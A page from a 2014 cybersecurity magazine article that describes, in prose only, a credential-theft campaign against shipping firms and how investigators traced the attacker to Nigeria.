Page 35 - index
P. 35
The initial attack comes in an email with an attachment. The file uses a PDF icon and the file
name is “Document.exe.” Once opened, a black PDF document appears, but otherwise no other
visible actions are noticeable. The smart thing about this attack is that it can be said it does not
use any malware to perform its malicious actions.
The original file is an installer, it contains a number of files and the only thing it is doing in the
computer is creating a folder and unzipping files into it. Then it executes one of the files and
exits. This starts the “infection” process, where it will run a number of different script files, one
after the other, and each one performing just a few tasks in order to avoid raising any alarm,
going unnoticed. These tasks go from creating registry entries to ensuring it will run every time
the computer starts, stealing all browser and email saved credentials (using legit freeware
software tools that let users recover saved credentials) and uploading them to an FTP.
And that is it, an easy way to steal credentials without using any “real” malware. It goes through
the credentials process every hour to capture any new saved username and password in the
system.
Who is Behind this Attack?
One of the weaknesses of using this kind of approach is the way the stolen credentials are sent.
Since it used the FTP command from one of the bat files and the same command included the
user name and password to access it, that is how the malware experts were ultimately able to
access it and download all the files.
The criminals behind this attack were using a free FTP service, and would access the control
panel with their credentials, where you could see all the information that the attackers had filed
to get the free FTP account, such as first and last name, country, city, zip code and email
address.
Of course this information was false. But where it became interesting was that the city listed was
Ikeja, a suburb of Lagos, the capital of Nigeria. Ikeja is known as the “Computer Village” for its
large computer market. Even though this didn’t mean the criminals were from Ikeja, this at least
inferred they were either from Nigeria or knew the region.
The one determining factor in breaking the case was the fraudster’s email address. This was the
only piece of information that had to be real, since it was needed it to activate the account
It was a Gmail account, and after some investigation, it was discovered that the person was
indeed from Ikeja.
The experts were able to identify the person as the owner of a shipping company in Nigeria. He
was stealing the credentials to get information out of those companies with details of real oil
cargo manifests. He intended to use that documentation to show it as a proof of product to the
victims that he will try to scam.
The shipping companies infected by this malware are all around the world, but most of them
were in Europe. The difficulty is that some of the companies have been hesitant to come
35 Cyber Warnings E-Magazine – November 2014 Edition
Copyright © Cyber Defense Magazine, All rights reserved worldwide
